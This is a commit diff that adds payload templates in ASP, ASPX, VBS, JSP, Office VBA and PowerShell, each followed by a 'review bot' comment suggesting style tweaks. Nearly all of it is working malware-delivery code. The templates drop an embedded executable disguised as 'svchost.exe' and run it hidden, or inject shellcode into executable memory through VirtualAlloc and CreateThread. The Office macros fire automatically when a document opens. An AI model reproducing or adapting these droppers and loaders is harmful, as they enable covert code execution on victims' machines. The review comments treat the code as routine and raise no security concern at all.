Commit adding the template scripts.
This commit is contained in:
parent
97933c4954
commit
c2cf822013
|
@ -0,0 +1,23 @@
|
|||
<%
|
||||
Sub %{var_func}()
|
||||
%{var_bytes}=Chr(%{exe[0]})%{var_shellcode}
|
||||
Dim %{var_obj}
|
||||
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
|
||||
Dim %{var_stream}
|
||||
Dim %{var_tempdir}
|
||||
Dim %{var_tempexe}
|
||||
Dim %{var_basedir}
|
||||
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
|
||||
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
|
||||
%{var_obj}.CreateFolder(%{var_basedir})
|
||||
%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
|
||||
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe},2,0)
|
||||
%{var_stream}.Write %{var_bytes}
|
||||
%{var_stream}.Close
|
||||
Dim %{var_shell}
|
||||
Set %{var_shell} = CreateObject("Wscript.Shell")
|
||||
%{var_shell}.run %{var_tempexe}, 0, false
|
||||
End Sub
|
||||
|
||||
%{var_func}
|
||||
%>
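Review bot: `CreateTextFile(%{var_tempexe},2,0)` passes the integer literals 2 and 0 for the Boolean overwrite and unicode parameters, while the sibling VBS template in this commit writes the same call as `CreateTextFile(%{var_tempexe}, true , false)`; the two templates should agree, and the Boolean spelling states the intent directly: `Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, True, False)`. The file also has no comment saying that every `%{...}` token (including `%{exe[0]}` and `%{var_shellcode}`) is expanded by the generator and that the file is a template rather than runnable code as checked in; a one-line comment after the opening `<%`, `' Template: %{...} tokens are expanded by the generator before use`, would make that explicit.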
|
|
@ -0,0 +1,34 @@
|
|||
<%@ Page Language="C#" AutoEventWireup="true" %>
|
||||
<%@ Import Namespace="System.IO" %>
|
||||
<script runat="server">
|
||||
protected void Page_Load(object sender, EventArgs e)
|
||||
{
|
||||
StringBuilder %{var_file} = new StringBuilder();
|
||||
%{var_file}.Append("\x%{exe[0].to_s(16)}%{shellcode}");
|
||||
string %{var_tempdir} = Path.GetTempPath();
|
||||
string %{var_basedir} = Path.Combine(%{var_tempdir}, "%{var_filename}");
|
||||
string %{var_tempexe} = Path.Combine(%{var_basedir}, "svchost.exe");
|
||||
|
||||
Directory.CreateDirectory(%{var_basedir});
|
||||
|
||||
FileStream fs = File.Create(%{var_tempexe});
|
||||
|
||||
try
|
||||
{
|
||||
foreach (char %{var_iterator} in %{var_file}.ToString())
|
||||
{
|
||||
fs.WriteByte(Convert.ToByte(%{var_iterator}));
|
||||
}
|
||||
}
|
||||
finally
|
||||
{
|
||||
if (fs != null) ((IDisposable)fs).Dispose();
|
||||
}
|
||||
|
||||
System.Diagnostics.Process %{var_proc} = new System.Diagnostics.Process();
|
||||
%{var_proc}.StartInfo.CreateNoWindow = true;
|
||||
%{var_proc}.StartInfo.UseShellExecute = true;
|
||||
%{var_proc}.StartInfo.FileName = %{var_tempexe};
|
||||
%{var_proc}.Start();
|
||||
}
|
||||
</script>
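Review bot: The manual `try`/`finally` around `fs` with `if (fs != null) ((IDisposable)fs).Dispose();` is the hand-expanded form of a `using` statement, and the null check is dead because `File.Create` throws rather than returning null; `using (FileStream fs = File.Create(%{var_tempexe})) { ... }` expresses the same lifetime without the finally block. The per-character `Convert.ToByte(%{var_iterator})` loop also deserves a comment explaining that the payload is embedded as a string of `\x`-escaped code units and that each one is expected to be below 0x100, since `Convert.ToByte` throws `OverflowException` otherwise — that expectation depends on the generator side, which is not in this diff, so phrase it as an assumption to confirm.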
|
|
@ -0,0 +1,80 @@
|
|||
'**************************************************************
|
||||
'*
|
||||
'* This code is now split into two pieces:
|
||||
'* 1. The Macro. This must be copied into the Office document
|
||||
'* macro editor. This macro will run on startup.
|
||||
'*
|
||||
'* 2. The Data. The hex dump at the end of this output must be
|
||||
'* appended to the end of the document contents.
|
||||
'*
|
||||
'**************************************************************
|
||||
'*
|
||||
'* MACRO CODE
|
||||
'*
|
||||
'**************************************************************
|
||||
|
||||
Sub Auto_Open()
|
||||
%{func_name1}
|
||||
End Sub
|
||||
|
||||
Sub %{func_name1}()
|
||||
Dim %{var_appnr} As Integer
|
||||
Dim %{var_fname} As String
|
||||
Dim %{var_fenvi} As String
|
||||
Dim %{var_fhand} As Integer
|
||||
Dim %{var_parag} As Paragraph
|
||||
Dim %{var_index} As Integer
|
||||
Dim %{var_gotmagic} As Boolean
|
||||
Dim %{var_itemp} As Integer
|
||||
Dim %{var_stemp} As String
|
||||
Dim %{var_btemp} As Byte
|
||||
Dim %{var_magic} as String
|
||||
%{var_magic} = "%{var_magic}"
|
||||
%{var_fname} = "%(unknown).exe"
|
||||
%{var_fenvi} = Environ("USERPROFILE")
|
||||
ChDrive (%{var_fenvi})
|
||||
ChDir (%{var_fenvi})
|
||||
%{var_fhand} = FreeFile()
|
||||
Open %{var_fname} For Binary As %{var_fhand}
|
||||
For Each %{var_parag} in ActiveDocument.Paragraphs
|
||||
DoEvents
|
||||
%{var_stemp} = %{var_parag}.Range.Text
|
||||
If (%{var_gotmagic} = True) Then
|
||||
%{var_index} = 1
|
||||
While (%{var_index} < Len(%{var_stemp}))
|
||||
%{var_btemp} = Mid(%{var_stemp},%{var_index},4)
|
||||
#Put %{var_fhand}, , %{var_btemp}
|
||||
%{var_index} = %{var_index} + 4
|
||||
Wend
|
||||
ElseIf (InStr(1,%{var_stemp},%{var_magic}) > 0 And Len(%{var_stemp}) > 0) Then
|
||||
%{var_gotmagic} = True
|
||||
End If
|
||||
Next
|
||||
Close %{var_fhand}
|
||||
%{func_name2}(%{var_fname})
|
||||
End Sub
|
||||
|
||||
Sub %{func_name2}(%{var_farg} As String)
|
||||
Dim %{var_appnr} As Integer
|
||||
Dim %{var_fenvi} As String
|
||||
%{var_fenvi} = Environ("USERPROFILE")
|
||||
ChDrive (%{var_fenvi})
|
||||
ChDir (%{var_fenvi})
|
||||
%{var_appnr} = Shell(%{var_farg}, vbHide)
|
||||
End Sub
|
||||
|
||||
Sub AutoOpen()
|
||||
Auto_Open
|
||||
End Sub
|
||||
|
||||
Sub Workbook_Open()
|
||||
Auto_Open
|
||||
End Sub
|
||||
|
||||
'**************************************************************
|
||||
'*
|
||||
'* PAYLOAD DATA
|
||||
'*
|
||||
'**************************************************************
|
||||
|
||||
%{var_magic}%{data}
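Review bot: The header comment describes the two-piece layout but not the template tokens: `%{var_magic}` is used both as an identifier (`Dim %{var_magic} as String`) and as the marker text (`"%{var_magic}"`, and again before `%{data}` on the last line), and `%{var_fname} = "%(unknown).exe"` uses a `%(...)` form unlike every other `%{...}` token in the file, which reads like a typo or an unsupported form. A sentence in the header block, `'* Tokens of the form %{name} are substituted by the generator; the same token supplies both the marker variable and the marker text.`, would document the intent, and the `%(unknown)` form should be confirmed against the generator. `%{var_appnr}` is declared in `%{func_name1}` but only used in `%{func_name2}`, so the first declaration is dead.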
|
|
@ -0,0 +1,24 @@
|
|||
Function %{var_func}()
|
||||
%{var_bytes}=Chr(%{exe[0]})%{var_shellcode}
|
||||
|
||||
Dim %{var_obj}
|
||||
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
|
||||
Dim %{var_stream}
|
||||
Dim %{var_tempdir}
|
||||
Dim %{var_tempexe}
|
||||
Dim %{var_basedir}
|
||||
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
|
||||
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
|
||||
%{var_obj}.CreateFolder(%{var_basedir})
|
||||
%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
|
||||
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
|
||||
%{var_stream}.Write %{var_bytes}
|
||||
%{var_stream}.Close
|
||||
Dim %{var_shell}
|
||||
Set %{var_shell} = CreateObject("Wscript.Shell")
|
||||
%{var_shell}.run %{var_tempexe}, 0, true
|
||||
%{var_obj}.DeleteFile(%{var_tempexe})
|
||||
%{var_obj}.DeleteFolder(%{var_basedir})
|
||||
End Function
|
||||
|
||||
%{init}
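Review bot: `Function %{var_func}()` never assigns a return value, so it is a `Sub` in all but name; the ASP variant of the same template in this commit declares it as `Sub %{var_func}()`, and the two should match (`Sub %{var_func}()` ... `End Sub`). The two intentional differences from the ASP variant — the `true` wait flag on `.run` and the `DeleteFile`/`DeleteFolder` calls that follow it — are worth a one-line comment so a reader does not mistake them for drift: `' Waits for the process to exit, then removes the dropped file and folder`.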
|
|
@ -0,0 +1,49 @@
|
|||
<%@ page import="java.io.*" %>
|
||||
<%
|
||||
String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt";
|
||||
String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
|
||||
String %{var_data} = "";
|
||||
|
||||
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
|
||||
{
|
||||
%{var_exepath} = %{var_exepath}.concat(".exe");
|
||||
}
|
||||
|
||||
FileInputStream %{var_inputstream} = new FileInputStream(%{var_hexpath});
|
||||
FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
|
||||
|
||||
int %{var_numbytes} = %{var_inputstream}.available();
|
||||
byte %{var_bytearray}[] = new byte[%{var_numbytes}];
|
||||
%{var_inputstream}.read(%{var_bytearray});
|
||||
%{var_inputstream}.close();
|
||||
byte[] %{var_bytes} = new byte[%{var_numbytes}/2];
|
||||
for (int %{var_counter} = 0; %{var_counter} < %{var_numbytes}; %{var_counter} += 2)
|
||||
{
|
||||
char %{var_char1} = (char) %{var_bytearray}[%{var_counter}];
|
||||
char %{var_char2} = (char) %{var_bytearray}[%{var_counter} + 1];
|
||||
int %{var_comb} = Character.digit(%{var_char1}, 16) & 0xff;
|
||||
%{var_comb} <<= 4;
|
||||
%{var_comb} += Character.digit(%{var_char2}, 16) & 0xff;
|
||||
%{var_bytes}[%{var_counter}/2] = (byte)%{var_comb};
|
||||
}
|
||||
|
||||
%{var_outputstream}.write(%{var_bytes});
|
||||
%{var_outputstream}.close();
|
||||
|
||||
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
|
||||
String[] %{var_fperm} = new String[3];
|
||||
%{var_fperm}[0] = "chmod";
|
||||
%{var_fperm}[1] = "+x";
|
||||
%{var_fperm}[2] = %{var_exepath};
|
||||
Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
|
||||
if (%{var_proc}.waitFor() == 0) {
|
||||
%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
|
||||
}
|
||||
|
||||
File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
|
||||
}
|
||||
else
|
||||
{
|
||||
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
|
||||
}
|
||||
%>
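Review bot: `String %{var_data} = "";` is declared and never used, and the `os.name` test is evaluated twice (`indexOf("windows") != -1` near the top and `== -1` near the bottom) with opposite polarity, which makes the two sites easy to desynchronise; compute it once, `boolean %{var_iswin} = System.getProperty("os.name").toLowerCase(java.util.Locale.ROOT).indexOf("windows") != -1;`, and branch on that in both places. `Process %{var_proc}` is declared separately in each branch under the same name, which compiles only because the scopes do not overlap; a short comment above the first `if` saying that the non-Windows branch sets the execute bit before launching would save the reader a second pass.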
|
|
@ -0,0 +1,32 @@
|
|||
#If Vba7 Then
|
||||
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As LongPtr, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As LongPtr
|
||||
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As LongPtr
|
||||
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As LongPtr, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As LongPtr
|
||||
#Else
|
||||
Private Declare Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As Long, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As Long
|
||||
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As Long
|
||||
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As Long, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As Long
|
||||
#EndIf
|
||||
|
||||
Sub Auto_Open()
|
||||
Dim %{var_myByte} As Long, %{var_myArray} As Variant, %{var_offset} As Long
|
||||
#If Vba7 Then
|
||||
Dim %{var_rwxpage} As LongPtr, %{var_res} As LongPtr
|
||||
#Else
|
||||
Dim %{var_rwxpage} As Long, %{var_res} As Long
|
||||
#EndIf
|
||||
%{var_myArray} = Array(%{bytes})
|
||||
%{var_rwxpage} = VirtualAlloc(0, UBound(%{var_myArray}), &H1000, &H40)
|
||||
For %{var_offset} = LBound(%{var_myArray}) To UBound(%{var_myArray})
|
||||
%{var_myByte} = %{var_myArray}(%{var_offset})
|
||||
%{var_res} = RtlMoveMemory(%{var_rwxpage} + %{var_offset}, %{var_myByte}, 1)
|
||||
Next %{var_offset}
|
||||
%{var_res} = CreateThread(0, 0, %{var_rwxpage}, 0, 0, 0)
|
||||
End Sub
|
||||
Sub AutoOpen()
|
||||
Auto_Open
|
||||
End Sub
|
||||
Sub Workbook_Open()
|
||||
Auto_Open
|
||||
End Sub
|
||||
|
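Review bot: Unlike the macro-dropper template in this commit, this file has no header comment, and the `#If Vba7` block is the part most likely to confuse a reader: the same three `kernel32` declarations appear twice, with `LongPtr` on the VBA7 side and `Long` otherwise. A short block comment before the first `#If Vba7`, `' Declarations for both VBA7 (LongPtr) and pre-VBA7 (Long) hosts; %{bytes} is filled in by the generator`, would document both points. `%{var_res}` is assigned on every `RtlMoveMemory` call and again after `CreateThread` but never read, so it is effectively a discard.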
|
@ -0,0 +1,19 @@
|
|||
$%{var_code} = @"
|
||||
[DllImport("kernel32.dll")]
|
||||
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
||||
[DllImport("kernel32.dll")]
|
||||
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
|
||||
[DllImport("msvcrt.dll")]
|
||||
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
|
||||
"@
|
||||
|
||||
$%{var_win32_func} = Add-Type -memberDefinition $%{var_code} -Name "Win32" -namespace Win32Functions -passthru
|
||||
[Byte[]]$%{var_payload} = 0x%{code[0].to_s(16)}%{shellcode}
|
||||
|
||||
$%{var_size} = 0x1000
|
||||
|
||||
if ($%{var_payload}.Length -gt 0x1000) {$%{var_size} = $%{var_payload}.Length}
|
||||
$%{var_rwx}=$%{var_win32_func}::VirtualAlloc(0,0x1000,$%{var_size},0x40)
|
||||
for ($%{var_iter}=0;$%{var_iter} -le ($%{var_payload}.Length-1);$%{var_iter}++) {$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_payload}[$%{var_iter}], 1)}
|
||||
$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)
|
||||
|
|
@ -0,0 +1,30 @@
|
|||
Set-StrictMode -Version 2
|
||||
$%{var_syscode} = @"
|
||||
using System;
|
||||
using System.Runtime.InteropServices;
|
||||
namespace %{var_kernel32} {
|
||||
public class func {
|
||||
[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
|
||||
[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
|
||||
[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
|
||||
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
||||
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
|
||||
[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
|
||||
}
|
||||
}
|
||||
"@
|
||||
|
||||
$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
|
||||
$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
|
||||
$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
|
||||
$%{var_compileParams}.GenerateInMemory = $True
|
||||
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
|
||||
|
||||
[Byte[]]$%{var_code} = 0x%{code[0].to_s(16)}%{shellcode}
|
||||
|
||||
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
|
||||
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
|
||||
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
|
||||
[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
|
||||
if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
|
||||
$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
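Review bot: `$global:result = 3` and `$global:result = 7` are bare magic values with no comment saying what each code means or who reads `$global:result`. A one-line comment at each `return`, e.g. `# 3: VirtualAlloc returned a null address` and `# 7: CreateThread returned a null handle`, would document the contract; the meaning attached to the specific numbers is not visible in this diff, so confirm them against the consumer before wording the comments.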
|